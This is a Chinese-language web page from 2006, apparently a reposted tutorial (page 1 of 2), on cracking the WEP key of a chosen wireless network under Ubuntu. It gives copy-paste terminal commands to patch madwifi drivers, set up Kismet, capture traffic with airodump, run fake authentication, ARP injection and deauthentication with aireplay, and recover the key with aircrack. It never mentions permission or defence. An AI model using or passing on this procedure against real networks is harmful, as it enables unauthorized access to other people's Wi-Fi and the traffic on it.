网络安全 | UNIX | GPS | 无线 | 在线手册 | OSBUG.ORG | SUNNY-NETWORK.COM
天线制作 GPS 地标
网站地图 RSS订阅
高级搜索 收藏本站
首页 | 业界动态 | Mesh | WLAN/WiFi | WiMAX | GPRS/CDMA 1X | 3G | UWB | ZigBee | RFID | Bluetooth | EDGE | MIMO | 红外通讯 | 集群通信 | 天线 | 电磁兼容 | 软件无线电 | 业余无线电
 当前位置: 首页 > WLAN/WiFi > 安全 > 文章  
秘笈揭露 Ubuntu破解WEP密钥一点不费劲
文章来源: 天极yesky 文章作者: 发布时间: 2006-07-06   字体: [ ]  
 

这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器是Atheros Communications……

我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:

sudo -i
cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
modprobe ath_pci

如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。

sudo gedit /etc/kismet/kismet.conf

把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。

现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。

sudo airmon start ath0
sudo kismet

找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。

接下来运行airodump。

sudo airodump ath0 filename channel# 1

文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。

从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。

接下来我们想开始注入数据包。

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:

sudo aireplay -0 ath0 -a BSSID ath0

否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。

sudo aircrack filename.ivs

一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。

这做起来一点都不费劲,但可以起作用。

下载Ubuntu LTS

 
推荐文章
·排疑解惑:解开无线路由器罢工谜
·WIFI上网及PocketLAN连接局域网
·玩玩无线上网---DIY 2.4g淘米筐w
·大卸八块!笔记本无线网络升级总
·经典产品 小型办公室无线路由器
·无限无线: 无线网卡篇(MiniPCI)
·1.2公里组建无线网桥只要360元(
·双机家庭无线组网—双机组网指南
·家庭无线网络设置指南
·家庭无线网络(WLAN)组建指南
·无线网攻击工具进攻方法及防范技
·30KM不是梦!网友DIY增益无线天
·放飞梦想——新居宽带无线共享上
·随时随地组网:无线对等网络的安
 
 
共2页: 上一页 [1] 2 下一页
↑返回顶部 打印本页 关闭窗口↓ 

Google
 
Web oldhand.org unixreference.net meshmea.org
相关分类
热点文章
·自己动手做2.4G无线网络
·教你自制2.4G定向天线
·玩玩无线上网---DIY 2.4
·30KM不是梦!网友DIY增
·超远距2.4G无线网络天线
·多普达830完美WIFI补丁
·2.4G天线制作资料
·1.2公里组建无线网桥只
相关文章
·无线网络安全八大技术利
·WLAN安全五步曲
·谁偷窥了我的WLAN?
·室外5公里的802.11b无线
·如何规划WLAN
·点对点2.4GHz无线链路安
·使用OmniPeek实现无线监
·Wi-Fi是3G的竞争网络
更多资源
 
 

Copyright(c) 2001-2007 OLDHAND ORGANIZATION, All Rights reserved.
Power by DedeCms 织梦内容管理系统
$Id: article_article.html,v 1.1 2007/02/05 21:09:23 yjs Exp $